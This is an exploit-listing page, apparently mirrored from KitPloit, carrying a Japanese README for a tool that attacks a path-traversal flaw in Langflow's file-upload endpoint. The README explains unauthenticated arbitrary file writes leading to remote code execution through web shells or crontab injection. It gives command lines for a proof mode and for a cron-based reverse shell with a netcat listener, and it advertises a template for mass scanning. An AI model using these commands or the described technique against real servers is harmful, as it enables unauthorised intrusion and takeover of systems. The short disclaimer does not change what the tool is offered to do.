Sploitus

Exploit for CVE-2026-5027

kitploit · 2026-08-25

Exploit Code

MARKDOWN107 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XBLACKASH-CVE-2026-5027
# 🔥 CVE-2026-5027 - Langflow パストラバーサル

![サイバーセキュリティの脆弱性: パストラバーサルエクスプロイト](https://assets.kitploit.com/production/public/readmes/42504/e0e081b7a01985245bb650ebee8a10e0bd7261c55052a4a1eed6150816b91293.png)

**任意ファイル書き込みによるRCE**  
_未認証のリモートコード実行(ファイルアップロード経由)_

![CVE](https://img.shields.io/badge/CVE-2026--5027-critical-red?style=for-the-badge) ![CVSS](https://img.shields.io/badge/Severity-8.8%20\(High\)-orange?style=for-the-badge) ![Exploit](https://img.shields.io/badge/Exploit-PoC%20Ready-green?style=for-the-badge)

* * *

## 📌 概要

**Langflow** は、ファイルアップロードエンドポイント(`POST /api/v2/files`)において重大な**パストラバーサル** の脆弱性の影響を受けます。

攻撃者は、`../` シーケンスを含む悪意のあるファイル名を送信することで、サーバーのファイルシステム上の任意の場所に**任意のファイルを書き込む** ことができます。

これは、例えばウェブシェルを配置したり crontab に注入したりすることで、**完全なリモートコード実行(RCE)** に容易に繋がります。

* * *

## 🛠️ 機能

  * ✅ 未認証での悪用(デフォルトの自動ログイン設定)
  * ✅ シンプルな概念実証(`/tmp` にテストファイルを書き込み)
  * ✅ cron による完全なリバースシェル(Linux)
  * ✅ 大量スキャン用の Nuclei テンプレート付属
  * ✅ トラバーサル深度のカスタマイズが容易



* * *

## 🚀 クイックスタート

### 1\. 概念実証(安全なテスト)

root@kitploit:~
    
    
    python3 CVE-2026-5027.py -t http://target:7860/ --proof
    

**脆弱性がある場合の期待される出力:**

root@kitploit:~
    
    
    [+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
    

### 2\. 完全なリバースシェル

root@kitploit:~
    
    
    # Start listener
    nc -lvnp 4444
    
    # Run exploit
    python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
    

* * *

## 📁 リポジトリ構成

ファイル| 説明  
---|---  
`CVE-2026-5027.py`| メインの Python エクスプロイト(PoC + RCE)  
`CVE-2026-5027.yaml`| スキャン用の Nuclei テンプレート  
`README.md`| このファイル  
  
* * *

## 🎯 使用例

![cve-2026-5027](https://assets.kitploit.com/production/public/readmes/42504/4ca17e5e0763ca68fe52752f4dc2e3ef3a2c46d7b6001ba1f69c93a1417612f3.png)

**証明モード**

root@kitploit:~
    
    
    python3 CVE-2026-5027.py -t http://target.com/ --proof
    

**リバースシェルモード**

root@kitploit:~
    
    
    python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
    

* * *

## ⚠️ 免責事項

このリポジトリは、**教育的および許可されたセキュリティテストの目的のみ** で提供されています。

責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。

* * *

**レッドチームコミュニティのために ❤️ を込めて作られました**